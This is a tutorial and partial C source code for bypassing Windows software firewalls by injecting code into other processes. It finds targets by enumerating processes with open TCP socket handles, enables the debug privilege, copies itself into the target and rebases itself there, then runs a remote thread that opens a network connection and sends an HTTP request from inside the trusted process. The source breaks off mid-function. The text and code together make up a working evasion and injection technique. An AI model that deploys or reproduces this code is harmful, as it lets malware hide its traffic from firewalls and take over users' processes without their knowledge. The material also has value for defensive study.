Bypassing software firewalls using process infection

Bypassing software firewalls using process infection

Introduction

Before we start; as most of you know, this article will probably (and probably should be) overshadowed by rattle�s article of the same title ( http://www.phrack.org/show.php?p=62&a=13 ). The reason I have chosen to recreate it, is firstly because a lot of people have found it difficult to comprehend, and secondly I�ve come across some improvements of my own, worth adding.

It seems most of the issue is with the use of relocatable assembly code � while this is all 1337, all the same reasons for not using it pop up. Most of us sort of learn to read/write it, but it�s never been as clear or expandable as a HLL. With some neat tricks � the computing underworld has circumvented such an issue. I�ll try to explain it, as you guys (and I) can understand it.

A quick walkthrough of things you’ll probably need to know

Like I said, a quick walkthrough, there is probably gigabytes of this crap on the interweb. It applies to win32 as it is now and probably modern memory management across most OS�s. If you are a cool cat you can probably just use this for reference.

Processes in memory

Processes are (virtual) address spaces that have executable code (that may or may not be currently executed). Modules are executables or libraries loaded into this address space � basically anything in PE format. Threads are a way to split execution of a process into parallel streams of instructions � usually independent of each other.

There are 4 types of address that exist � and we will only ever see 3 of them. The first is an actual physical address � we can forget about this one, our operating system handles it. The second is an absolute address (as defined in a process space) that references a tangible address in that particular process space. That is; we don�t need to do anything to it to make it point in the correct place. The third is a virtual address � this doesn�t really exist, only to make our lives easier. It will point (an absolute address) to the base of the current module, which is how we can calculate the absolute address of a RVA. A relative virtual address (or RVA) is defined as the absolute address minus the virtual address. If this sounds a little complicated, it is. I like to think of RVA as Relative _to_ _the_ Virtual Address. The goal of RVA�s is to avoid hard coded addresses � or at least minimise their irreparable use. This brings us onto why we need them � and the windows loader.

The windows loader

The windows loader has a simple purpose; it must fetch the file off the disk and make it work in memory. This sounds pretty simple, and it most cases it is. Its first step is to create the space and put the primary module (usually the executable you click) into memory. It then looks for any dependencies this executable has � libraries it needs like ws2_32.dll and probably/definitely kernel32.dll. Modules have preferred load addresses, and at the start all their in code addresses will be absolute (or hard coded) addresses relative to this fact. So what happens if there is a collision? Well bummer, it needs to go somewhere else. This means that all hard coded addresses need to be changed, which is easy because (after ripping it off COFF) PE format has a section usually called .reloc which contains RVA�s to hard coded addresses that need to be changed in event of collision. Now the reason executables usually have this stripped is that they are always loaded first, and so, certain to get their preferred load address. This is why dll injection works. The loadlibrary call, pushes the windows loader to sort out the modules code, most likely using the .reloc table in the process. Therefore our goal is basically to emulate the windows loader, in order to execute our module in another process space. It�s important to note, this isn�t _all_ the windows loader does, but it�s what is important to us for this article.

Brief PE format

Now this will be really brief, it would be really quite easy to waffle on into irrelevancy on this subject. To gain a (more) complete overview of PE format (and some other neat stuff) you should check the URLs/references for Matt Petrieks article(s) on PE format.

The first structure is an IMAGE_DOS_HEADER. This has little interest to us � other than it has a pointer (a RVA) to the IMAGE_NT_HEADERS structure. This is important because we need to jump over a small stub program to tell DOS users to get with the freekin� times. The IMAGE_NT_HEADERS structure is plural for a reason � it actually contains pointers to two other structures, the IMAGE_FILE_HEADER which we won�t really need, and the IMAGE_OPTIONAL_HEADER structure (which isn�t optional.) The IMAGE_OPTIONAL_HEADER has lots of pretty stuff in it, including the data directory. If you need to check if you�re in the right place � IMAGE_NT_HEADERS also has a member called Signature, which should always be �PE\0\0�.

The data directory is what we need to find first. It is an array of 16 IMAGE_DATA_DIRECTORY structures, and contains addresses (RVAs) to each section in the PE file. Sections can contain code, relocations, resources and almost anything you can imagine. In short we need to find the .reloc section, we do this by using a predefined index called IMAGE_DIRECTORY_BASERELOC (or 5). From this we can get to the .reloc (or the base relocations) section (remember not all executables have this! You�ll need to get your compiler to output it. (MSVC - pass /fixed:no in the linker switches))

This brings us to the base relocations section. The base relocations section is set like this: A series of blocks that correspond to pages in memory. These blocks are comprised of each memory location that needs to be altered. We calculate the change ourselves :).

How software firewalls work

Software firewalls work by hooking API calls, usually as a driver. They then dictate who and who shall not be permitted to use them, usually by some use of checksums and tables of who the user has allowed.

Our idea is to �hide� in another processes space that has the privileges to access the internet, which in turn allows us to bypass the firewall. The act of injecting your code into another process�s address space is called process infection (hence the title :). This usually happens without the application(s) knowing they have been infected.

Process infection without external dll or 1337 code

Right so, down to the mechanics. I�ve split this up into stages, partly because it makes it easier, and partly because it just divides up nicely. (As quick reviser of what we�re doing; we want to put our code in another process, and fix up all hard coded addresses using the .reloc section.)

First

We need to get some space (anywhere we can, it doesn�t matter) in the other process. This is quite a complicated issue; as it appears only partially abstracted by windows but, well whatever we need to do it anyway. We can allocate ourselves a series of pages (if you don�t know what pages are, don�t worry. It�s just memory to you and me) using the VirtualAllocEx() API. This takes 5 arguments, most of which I�ll assume you understand, or can understand from the manual on msdn.microsoft.com. Points that are specifically important to us are; passing NULL as the specified address (this allocates us memory anywhere it�s available) and the protection values/reservation type. The protection values should be set to PAGE_EXECUTE_READWRITE which allows us to do everything we want, and the reservation (or allocation) type needs to be MEM_COMIT | MEM_RESERVE.

The value that we are returned will be the address will be the new base for our module. We must convert all absolute addresses to represent that fact, that�s a catch to remember, as things become a little complicated dealing with multiple regions of memory.

Second

For this bit we�ll need to know the size of our module (or the module to be injected). This can either be found using some of the module enumeration APIs or by traversing our own IMAGE_NT_HEADERS struct, finding the SizeOfImage member in the IMAGE_OPTIONAL_HEADER struct. With this we need to make a copy of ourselves, so we don�t damage our own execution. To allocate memory, I like to use HeapAlloc(), if only for the reason there is an option to complain on error. Now you�d better CopyMemory() our module memory over into our newly allocated region :)

This location is the location the module that needs to be changed is at, but it is _not_ the address it needs to be rebased as, which is the address above.

Third

This is where the actual rebasing procedure begins and ends. To find the .reloc section, (I�ve briefly covered this before, but here it is more programmatically), we need to;

Find the DOS header. This is the base of the module (that we copied). From this, get �lfanew� (which is an RVA) and add it to the base of the module to get a pointer to the NT headers. The source code has a handy macro (which has been abused so much I don�t know who to accredit it to) for adding an integer to pointers without interference.

The absolute address of the .reloc table can then be found via the IMAGE_OPTIONAL_HEADER/DataDirectory structure(s). Somewhat like this
OP_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress plus the absolute address of the copied module. And yes, it is an RVA. not _the_ virtual address. Grunt.

The size of this section is also included in the same place, which is useful because we�ll need to iterate through the blocks. For each block, the entries are words. The upper 4 bits indicate the type of relocation, which will be either IMAGE_REL_BASED_ABSOLUTE or IMAGE_REL_BASED_HIGHLOW. Ignore IMAGE_REL_BASED_ABSOLUTE as it is used as padding. The lower 12 bits are an offset from the section virtual address (as above) to the hard coded address. To calculate exactly how much you need to add (otherwise known as the delta) to the hard coded address, subtract the preferred image base from the actual new address for the module. Add the delta to the area pointed to by the above offset from the section�s (relative) virtual address. Continue this until you have looped through all the blocks. I think the source code shows this a little better than my fumbling English. :)

And finally

Write the rebased module to the other address space using WriteProcessMemory(). After this, all that needs to be done is call CreateRemoteThread() (you should also be able to manipulate the thread context if CreateRemoteThread() is hooked) on the new module, the entry point can be a (rebased) address from your module, or the EntryPoint member in the optional header. Gold! (quite a lot of debugging later!)

Known Issues

Well with the correct permissions this idea will be able to infect any process, however; we�re not completely correctly emulating the windows loader. No doubt many tasks are performed by it that at this stage, that we just don�t need to emulate. For example, the IAT could contain the wrong addresses if libraries have been loaded in different places, possibly causing an unidentified catastrophic error on runtime. Fix that with your own black magic :)

Beating hooks on CreateProcess(), and a different method of finding trusted processes

Many firewalls today hook CreateProcess(), these catch out rattle�s original method of launching an invisible browser to communicate. My method involves reading active TCP connections; and the processes that host them. If we find one, we jack it.

We could do this by calling the GetExtendedTcpTable() API with AF_INET as the �ulAf� indicating that we would like only IPv4 connections, and TCP_TABLE_OWNER_PID_CONNECTIONS as the tableclass. This should give us a list of active connections along with their owning pids to infect. If for any reason this should fail, we can simply move onto the next one in the list. It sounds simple enough, the trouble is; GetExtendedTcpTable (according to its documentation) was only just included in XP sp2. Other similar functions we�re only just included in XP. Our search for gingerbread missionaries continues.

After digging around, I can�t find a documented way for uncovering network connections pre-XP. I have found however, that using NtQuerySystemInformation() along with some undocumented stuff, we can enumerate all open handles in the system. We can then bring the handles
into our address space using DuplicateHandle(), and so query their information (namely the device they are using) using NtQueryObject(). We
can then filter for handles using �\Device\Tcp�. At this point we could go further and query the device for information such as connection endpoints, connection states and port numbers. I feel that this would just further complicate an issue already far too complex � if they have an open handle to a socket, and we can read it, I assume that they are a viable target. To combat the idea that well, man down, my code includes some �continue until you�re safely there� features, that, well, you�re all intelligent to understand and enjoy without me talking about it.

Conclusion

This method is different to most I�ve seen around. At this point, if English were not my native language, I would be making some excuses for any inadequacies in the way I have written. But it is, so check the source code for anywhere you get lost. I�ve tried to keep it commented, in the hope it might catch on.

Vale!

Source code

/* MAIN.C ---------------------*/
/* contains WinMain, base of app */

#include <windows.h>
#include <winsock.h>

#include "dmode.c"
#include "pInject.c"
#include "FindSocketHandles.c"

unsigned long InjectedFuncState; // global to notify the process injector of the injector func state
unsigned long LastEntryInjected = 0;

#define FUNC_INCOMPLETE 1 // a list of states InjectedFuncState can be
#define FUNC_SUCCESS 0
#define FUNC_FAILURE -1
#define FUNC_CONNECT_FAILURE -2 // important enough for its own code

/* some crap for our injected function */

typedef int (WINAPI *WSASTRT)
            (WORD, LPWSADATA);

typedef SOCKET (WINAPI *SOKT)
            (int, int, int);

typedef unsigned long (WINAPI *INET_ADR)
            ( const char* );

typedef unsigned short (WINAPI *HTNS)
            ( unsigned short );

typedef int (WINAPI *CNNCT)
            (SOCKET, const struct sockaddr*, int);

typedef int (WINAPI *SND)
            (SOCKET,  const char*, int, int);

typedef int (WINAPI *CLSE_SCK)
            (SOCKET);

typedef int (WINAPI *WSACLEAN)
            ();

/* more precisely crap so we can dynamically load winsock */

#define WSK_SENDSTR "GET /scripts/index.php?scan=hello%20from%20me HTTP/1.0\nFrom: Darth_Vader\nUser-Agent: Force/1.0\n\n"

int InjectedMeat(LPARAM lParam)
{
    // we can make any in-modular calls in the other process space here
    // beware of inter-modular calls, as they may have been located in different
    // places. this is why i've loaded winsock dynamically

    HMODULE hWinsock2;
    SOCKET mySock;
    WSADATA wsa_data;
    struct sockaddr_in RemoteAddrInfo;
    WSASTRT MyWSAStartup;
    SOKT MySocket;
    INET_ADR MyInetAddr;
    HTNS MyHtons;
    CNNCT MyConnect;
    SND MySend;
    CLSE_SCK MyCloseSocket;
    WSACLEAN MyWSACleanup;

    InjectedFuncState = FUNC_INCOMPLETE;

    hWinsock2 = LoadLibrary("ws2_32.dll");
        if (hWinsock2==NULL)
        { InjectedFuncState = FUNC_FAILURE; ExitThread(-1); }

    // at this point we assume it is all there, expect to die horribly if not
    MyWSAStartup = (WSASTRT)GetProcAddress(hWinsock2, "WSAStartup");
    MySocket = (SOKT)GetProcAddress(hWinsock2, "socket");
    MyInetAddr = (INET_ADR)GetProcAddress(hWinsock2, "inet_addr");
    MyHtons = (HTNS)GetProcAddress(hWinsock2, "htons");
    MyConnect = (CNNCT)GetProcAddress(hWinsock2, "connect");
    MySend  = (SND)GetProcAddress(hWinsock2, "send");
    MyCloseSocket = (CLSE_SCK)GetProcAddress(hWinsock2, "closesocket");
    MyWSACleanup = (WSACLEAN)GetProcAddress(hWinsock2, "WSACleanup");

    if(MyWSAStartup(MAKEWORD(2,0), &wsa_data)!=0)
    {
        InjectedFuncState = FUNC_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(0);
    }

    mySock = MySocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(mySock==INVALID_SOCKET)
    {
        InjectedFuncState = FUNC_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(-1);
    }

    ZeroMemory(&RemoteAddrInfo, sizeof(struct sockaddr_in));
    RemoteAddrInfo.sin_family = AF_INET;
    RemoteAddrInfo.sin_addr.s_addr = MyInetAddr("192.168.0.2");
    RemoteAddrInfo.sin_port = MyHtons(80);

    if(MyConnect(mySock, (struct sockaddr *) &RemoteAddrInfo, sizeof(RemoteAddrInfo)) < 0)
    {

        InjectedFuncState = FUNC_CONNECT_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(-1);
    }

    MySend(mySock, WSK_SENDSTR, strlen(WSK_SENDSTR), 0);

    MyCloseSocket(mySock);
    MyWSACleanup(&wsa_data);

    InjectedFuncState = FUNC_SUCCESS;
    ExitThread(0);
  return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                                LPSTR lpCmdLine, int nShowCmd)
{
    int ret;
    DWORD cbNeeded, dwRandIndex;
    POPEN_SOCK_HANDLE_INFO_EX pOSHIEx;
    char debugout[255];

    pOSHIEx = malloc(1);
    DebugMode(TRUE); //checking

    FindPIDsWithSocketHandles(pOSHIEx, 1, &cbNeeded);
        // sorry about the names here people, i kind of ran out of inspiration
    pOSHIEx = realloc(pOSHIEx, cbNeeded);
        // should probably check these
    FindPIDsWithSocketHandles(pOSHIEx, cbNeeded, &cbNeeded);
        // don't pass null for that last param, you'll probably crash 'n' burn
        // note: you can check the return values here
        // anything positive is a success - the number above zero indicates warnings

    dwRandIndex = 1 + LastEntryInjected;
    if (dwRandIndex > pOSHIEx->NumberOfEntries-1)
    {
        //we've probably used all our processes
        MessageBox(NULL, "CatastrophicError!", "PJECT", MB_ICONWARNING); //
        ExitThread(0);
    }

    LastEntryInjected++;

    sprintf(debugout, "injecting pid %d from %d poss", pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, pOSHIEx->NumberOfEntries);
    MessageBox(NULL, debugout, "INFO", MB_OK);

    ret = pInject(GetModuleHandle(NULL), pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, &InjectedMeat, GetCurrentProcessId());

    switch (ret)
    {
        case PINJECT_MEM_ERR:
            MessageBox(NULL, "THERE WAS A MEMORY ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_RELOC_ERR:
            MessageBox(NULL, "THERE WAS A RELOC ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_PROC_ACCESS_ERR:
            MessageBox(NULL, "THERE WAS A PROCESS ACCESS ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_NO_RELOC:
            MessageBox(NULL, "YOU IDIOT. NO RELOC TABLE", "FUCK", MB_OK);
    }


    return 0;
}

/* dmode.c ---------------- */
/* contains DebugMode() to activate the debug privilege */

#ifndef SUCCESS
#define SUCCESS 0
#endif
#ifndef FAILURE
#define FAILURE 1
#endif

// DebugMode (BOOL)
// with occasionally a tongue in cheek reference as god mode�=)
// activates the debug mode for the current process
// requires the privilege to be 'ENABLED'
// returns FAILURE on failure, and SUCCESS on success

int DebugMode(BOOL bToggle)
{
    HANDLE hToken;
    DWORD cbTokPriv = sizeof(TOKEN_PRIVILEGES);
    static TOKEN_PRIVILEGES tpGodModeActivated, tpOriginalMode;

    if (bToggle)
        {
        tpGodModeActivated.PrivilegeCount = 1;
        tpGodModeActivated.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tpGodModeActivated.Privileges[0].Luid);

        if (!OpenProcessToken(GetCurrentProcess(),
             TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
                        {
                            return FAILURE;
                        }

        if (!AdjustTokenPrivileges(hToken, FALSE, &tpGodModeActivated, sizeof(tpGodModeActivated),
                                    &tpOriginalMode, &cbTokPriv)  != ERROR_SUCCESS)
                            {
                                CloseHandle(hToken);
                                return FAILURE;
                            }
        CloseHandle(hToken);
        }

    else {

        if (! OpenProcessToken(GetCurrentProcess(),
                TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
                {
                    return FAILURE;
                }
        if (AdjustTokenPrivileges(hToken, FALSE, &tpOriginalMode, sizeof(tpOriginalMode), NULL, NULL)
                != ERROR_SUCCESS)
            {
                CloseHandle(hToken);
                return FAILURE;
            }

        }

    return SUCCESS;
}

/* pInject.c ---------------- */
/* functions related to process injection */
// pInject;
// contains functions related to process injection
// namely pInject ( DWORD dwPid, void* startAddress, DWORD dwAdditionalInfo)
// startAddress. Now that's a tough one !
// we will need to rebase that as well

// TODO:
// also fix IAT and other issues with relocatable code
// not a problem unless dlls are loaded in different places to in our address space
// if this is a problem (and this code hasn't been updated. now=9/6/2006)
// use GetProcAddress (assuming that's in the right place!)

#define PINJECT_SUCCESS 0
#define PINJECT_MEM_ERR -1
#define PINJECT_RELOC_ERR -2
#define PINJECT_PROC_ACCESS_ERR -3
#define PINJECT_NO_RELOC -4

#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
    // http://www.codeproject.com/dll/DLL_Injection_tutorial.asp
    // actually from a book by matt pietrek and whored out over the internet

int pInject(HANDLE hModule, DWORD dwInPid, void* pStartAddr, DWORD dwParam)
{
    HANDLE hOtherProcess;
    void *pNewModule, *pModuleAsData, *pBaseForRVA;
    WORD *wRelocRVAs;
    PIMAGE_DOS_HEADER pDOSHeader;
    PIMAGE_NT_HEADERS pNTHeader;
    PIMAGE_BASE_RELOCATION pBaseReloc;

    unsigned int i=0, j=0, nRelCount=0, offset;
    DWORD dwModSiz, dwWritten=0, dwMemDelta, dwBaseRelocSiz, *pAbsoluteRelocAddr, dwRelocSecOffset;

    // open the process
    hOtherProcess = OpenProcess(PROCESS_ALL_ACCESS,